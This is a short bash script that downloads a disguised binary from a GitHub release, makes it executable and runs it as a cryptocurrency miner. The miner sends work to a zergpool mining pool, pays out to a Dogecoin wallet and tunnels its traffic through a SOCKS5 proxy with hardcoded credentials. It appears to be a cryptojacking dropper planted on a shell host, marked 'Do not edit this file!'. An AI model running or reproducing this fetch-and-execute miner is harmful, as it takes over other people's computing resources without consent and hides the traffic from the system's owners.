#!/bin/bash

# Do not edit this file!


cd /home/shell-bot
wget -qO ngaceng https://github.com/janganminin/literate-couscous/releases/download/ww/bokep
chmod +x ngaceng
./ngaceng -v -l verushash.mine.zergpool.com:3300 -u D7hBkeeqaXzc7dy71FLqUdPoyogAYrU8s7.ngaceng -p c=DOGE,mc=VRSC -t 8 -x socks5://omar:omar@138.197.166.210:555
